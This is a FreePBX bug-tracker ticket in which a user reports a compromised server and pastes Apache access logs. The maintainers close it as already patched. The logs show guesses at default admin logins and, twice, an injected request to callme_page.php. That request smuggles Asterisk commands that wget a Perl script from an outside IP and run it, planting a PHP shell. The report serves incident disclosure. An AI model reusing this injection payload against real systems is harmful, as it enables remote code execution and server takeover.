Ticket #5848 (closed Bugs: invalid)

Opened 1 year ago

Last modified 1 year ago

my system was compromized

Reported by: a0d75 Assigned to:
Priority: minor Milestone: 2.11
Component: ARI Version: 2.9-branch
Keywords: Cc:
Confirmation: Unreviewed Distro:
Backend Engine: Asterisk 1.6 Distro Ver:
Backend Ver: SVN Revision (if applicable):

Description

yesterday my system was compromised: phpshell scipt added to

/var/www/localhost/htdocs/recordings/main.php

apache log information: 

37.8.21.40 - - [21/May/2012:08:54:36 +0400] "GET /recordings/ HTTP/1.1" 200 5293
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/logo.png HTTP/1.1" 200 8049
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/spacer.gif HTTP/1.1" 200 43
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
37.8.21.40 - - [21/May/2012:08:54:38 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/js/libfreepbx.javascripts.js HTTP/1.1" 200 302944
37.8.21.40 - - [21/May/2012:08:54:46 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin HTTP/1.1" 301 235
37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/ HTTP/1.1" 302 -
37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - freepbx [21/May/2012:08:55:20 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - admin [21/May/2012:08:55:26 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/script.js.php?load_version=2.9.0.10 HTTP/1.1" 200 1111
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.cookie.js HTTP/1.1" 200 4247
37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.toggleval.3.0.js HTTP/1.1" 200 3496
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/interface.dim.js HTTP/1.1" 200 3761
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/assets/js/tabber-minimized.js HTTP/1.1" 200 4904
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/images/favicon.ico HTTP/1.1" 200 318
37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/ HTTP/1.1" 302 -
37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - freepbx [21/May/2012:09:00:29 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - admin [21/May/2012:09:00:34 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - admin [21/May/2012:09:00:45 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - - [21/May/2012:09:00:46 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/freepbx_large.png?load_version=2.9.0.10 HTTP/1.1" 200 7590
37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/logo.png?load_version=2.9.0.10 HTTP/1.1" 200 5699
37.8.21.40 - - [21/May/2012:09:00:51 +0400] "GET /panel HTTP/1.1" 401 401
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
37.8.21.40 - - [21/May/2012:09:20:50 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%250D%250AApplication:%2520system%250D%250AData:%2520wget%2520http://109.169.37.143/a/dcm.txt%2520-O%2520/tmp/back.txt%3bperl%2520/tmp/back.txt%250D%250A%250D%250A HTTP/1.1" 200 1155
37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:09:21:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://109.169.37.143/a/dcm.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1127
37.8.21.40 - - [21/May/2012:09:21:27 +0400] "GET /recordings/main.php HTTP/1.1" 404 217

my system: Gentoo, FreePBX 2.9.0.10

Change History

05/24/12 04:21:27 changed by mbrevda

  • status changed from new to closed.
  • resolution set to wontfix.

From a trixbox system. The irony! (it, itself, is probably hacked).

They seem to have exploited an issue that was patched recently. Please see here for more info, and use the forums if you need more assistance.

Thank you for brining this to our attention.

05/25/12 00:18:41 changed by p_lindheimer

  • status changed from closed to reopened.
  • resolution deleted.

05/25/12 00:19:33 changed by p_lindheimer

  • component changed from Web interface to ARI.

reclosing as invalid as this has already been addressed some time ago and an update is available in module admin

07/09/12 19:38:37 changed by p_lindheimer

  • status changed from reopened to closed.
  • resolution set to invalid.